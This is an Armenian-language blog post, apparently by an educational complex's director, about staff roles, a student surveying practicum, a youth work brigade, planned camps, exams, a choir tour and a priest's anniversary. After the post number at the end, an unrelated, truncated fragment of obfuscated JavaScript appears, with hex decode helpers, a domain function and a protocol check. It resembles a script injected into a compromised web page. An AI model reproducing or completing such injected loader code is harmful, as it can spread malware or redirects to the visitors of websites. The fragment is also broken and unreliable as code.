Սոնա Փափազյան-Զառա Առաքելյան դուետը խոստանում է, չէ, սկսում է Դպրոց-պարտեզում, չէ, կրթահամալիրում ինքնուրույն գործունեությունը՝ որպես կառավարում… Տաթև Բլեյանը երեկ ստացավ «մանկավարժությամբ կրթահամալիրում ազատ գործելու հնարավորություն». իր ձևակերպումն է: Ու ձեր Տաթոն ֆիզարձակուրդում է… Իմ չորրորդ թոռնիկին անսովոր-անհամբեր եմ սպասում, ընդառաջ գնում, չորս + չորս ձևաչափն այնքա՜ն է գայթակղում (չորս երեխա, չորս թոռնիկ), որ ուզում ես օր առաջ խախտել… Շուշան ու Լիլիթ Բլեյանները մեզ լսո՞ւմ են…
Պրակտիկանտ-ուսանողների չափագրման աշխատանքները:
Լուսանկարները՝ Գոհար Եղոյանի:
Զառային՝ Մեդիայի մեր աղջկան, իմ սքանչելի օգնականին, էլ չես բռնի… Առաջ գիտեինք, եթե Մեդիայում չէ, ուրեմն չորրորդ հարկում է իրենց շենքի… Հիմա՝ Զառա, ո՞ւր ես… Ի՜նչ հավեսով, իրեն բնորոշ զվարթությամբ-խորհրդով Տաթևից էստաֆետն ընդունեց. Սոնայի հետ ոչ միայն ընկերներ են հեծանվով կրթահամալիրի ֆեյշն-գովազդ սլացքում, այլև էրեբունցիներ… Սոնային հանդիպեցի Դպրոց-պարտեզի մուտքի մոտ, երբ Երևանի Ճարտարապետության և շինարարության պետական համալսարանի գեոդեզիայից պրակտիկանտ-ուսանողների մեծ խմբի, խմբի ղեկավար՝ համալսարանի Գեոդեզիայի ամբիոնի երիտասարդ-ինքնավստահ վարիչի ու Ճարտարապետության ֆակուլտետի դեկանի տեղակալ Արմեն Շատվորյանի հետ անցնում էինք պրակտիկայի վայրերով, «Կրթական պարտեզով». մեր գյուղացիական տնտեսությունն է չափագրման առաջին տարածքը: Բոլոր միջոցներով ես արագացնում եմ ձիանոցի մանեժի կառուցումը, «գիշեր-ցերեկ» վիճակ եմ հայտարարել Խորենի համար, և ահա իմ գրով SOS-ի կոչ` օգնե՛ք, մեր ձիանոց-ձիավարժարանն անավարտ չթողնե՛ք… հո խայտառակ չե՞նք լինելու… Ճարտարապետության ֆակուլտետի հետ համատեղ ստեղծած նախագծային լաբորատորիան գործում է. օգոստոսի 22-ից 28-ը Կրթական պարտեզում իր աշխատանքները կսկսի նախագծային համալսարանի և կրթահամալիրի համատեղ նախագծային լաբորատորիայի բաց-միջազգային workshop-ը…
«Ընկերություն» պատանեկան ջոկատի աշխատանքը,
վաստակած հանգիստն ու զովը:
Լուսանկարները՝ Սոնա Փափազյանի:
Սոնան իր «Ընկերության» հետ եռուզեռի մեջ է… Չորրորդ-վեցերորդ դասարանցիների մի խումբ, դպրոցի թաղեցիներ ու գումարած այլ թաղեցիներ մաքրում են, բարեկարգում… շոգում-լողում, մարզվում… էլի աշխատում… Ընկերն աշխատանքի մեջ կճանաչվի, կկոփվի, փորձություն կանցնի… ծույլ մարդն ի՞նչ ընկեր… Ծուլությունն ազգային մի վիճակ է, ընկերությունը Սոնայի, ինչպես մեր աշխատանքի ջոկատները գալիս են խարխլելու ազգային ստատուս քվոն… Սոնայի հետ անցկացրած հունիսն անջնջելի հետքեր կթողնի, ինչպես Քոլեջի տղաների-աղջիկների կյանքում առվույտի դաշտի երկնումը, ինչպես ուսումնական վերնիսաժը՝ Քնարիկ Ներսիսյանի ու մեծ խումբ գեղարվեստցիների-պատանիների, Խորենի պատանի ընկերների կյանքում ձիանոցի կառուցումը, տեսա՞ք, երկու-երեք ամիս տքնանք, ու ձիու վրա կլինենք… ես այսպիսի աշխատանքին եմ հավատում՝ մարդու կոփման՝ ինքնավար ու կոնկրետ…
Երեկ, օրվա վերջում, մանկավարժական լաբորատորիայում պատանեկան, Ավագ դպրոցի դիմորդների՝ իններորդ-տասներորդ դասարանցիների այսպիսի ճամբարի կազմակերպման մասին էինք խոսում. տիար Գևորգն ու ես հաստատում ենք՝ Ավագ դպրոցի ղեկավար Մարթա Ասատրյանն այսօր արդեն իր շուրջը պիտի հավաքի ճամբարի պատանիների նախաձեռնող խմբին, ու միասին սկսեն կոնկրետ գործել իրենց համատեղ-ինքնավար ութ-տասնօրյա կյանքը, ապրեն-աշխատեն միասին ու նախագծեն, որպես խմբային գլխավոր գործ, իրենց ինքնավարության Ավագ դպրոցը, այո՛, հիմնադրեն իրե՛նց Ավագ դպրոցը: Ողջ կրթահամալիրն ու Սևանի «Ժայռ»-ը՝ ձեզ:
Հեծանիվներով բարի լույսը՝
Սեբաստիա պողոտայի պլեներային հարթակներում:
Լուսանկարները՝ Արմինե Թոփչյանի:
Քննությունների մասին դեռ կխոսենք. ճամբարում, ճամբարականների հետ, բայց այն մթնոլորտը, որ ստեղծվել է մեզանում, արդար-վստահելի-մանկավարժական է, հեղինակային… Ես խոստացել էի, որ անարձագանք չի մնա ոչ մի վրիպում-դիմում, գրավոր թե բանավոր, թեկուզ ծիտիկի միջոցով փոխանցած: Ինչ չդիմեցին` ես մնացի, լավ է: Քննական կենտրոնի ղեկավարը հաստատեց, որ գրավոր աշխատանքի հետ կապված ամեն մի դիմում սպառիչ ու անմիջական արձագանք է ստանում՝ սկան են անում աշխատանքն ու մեկնաբանություններով ուղարկում սովորողի հասցեին… ոչ մի բողոք:
Ահա ձեզ և «Սեբաստացիներ» ուսուցչական երգչախմբի ավագ Արմինե Թոփչյանի ու նախաձեռնության հեղինակ, սեբաստացի շրջանավարտ Մանեի ու Նարեի մայրիկ, Քոլեջի ուսանող Սյուզիի ներկայացրած «Բանգլադեշ-Վլադիկովկաս» երթի ծրագիրը: Օգնենք, որ այս համերգային շրջագայությունը նվեր լինի ոչ միայն Վլադիկովկասի ու ողջ երթուղու ունկնդիրներին, այլև նվեր-ուղեգիր շրջագայության-համերգի սեբաստացի երաժիշտների համար: Նրանք դա իրենց տարիների աշխատանքով վաստակել են…
Առվույտացան բանգլադեշի կասկադում:
Վաստակած օր էր երեկ Տեր Մեսրոպի՝ վարդապետ Արամյանի համար… Ես գիտեի՝ վաթսուն տարեկանն ինքն է, հիսունը՝ ես… Պարզվեց, որ Տեր Մեսրոպն ընդամենը հիսուն տարեկան է, և դա էր առիթը` Ազգային պատկերասրահում նրա երկհատորյակ-հաշվետվության, մարդու-գրիչի-գործչի քսանհինգամյա վաստակը հրապարակ բերելու… Որքա՜ն բեղուն գործերով կյանք՝ մի քսանհինգ տարում… Նախանձս եկավ… Մեր եկեղեցու վարդապետի աշխատանքին միշտ վերաբերվել եմ խորին հարգանքով…
Լծված խնդագին աշխատանքի
Պիտի իր անհուն երկի՛րն հերկի,—
Երկիր արևի՜, գինո՜ւ, երգի՜ —
Եվ մտքի՜, ոգո՜ւ բեղուն բերքի…
Ե. Չարենց
Ֆոտոխմբագիր՝ Զարուհի Առաքելյան
# 708
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ashotbleyan.mskh.am"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e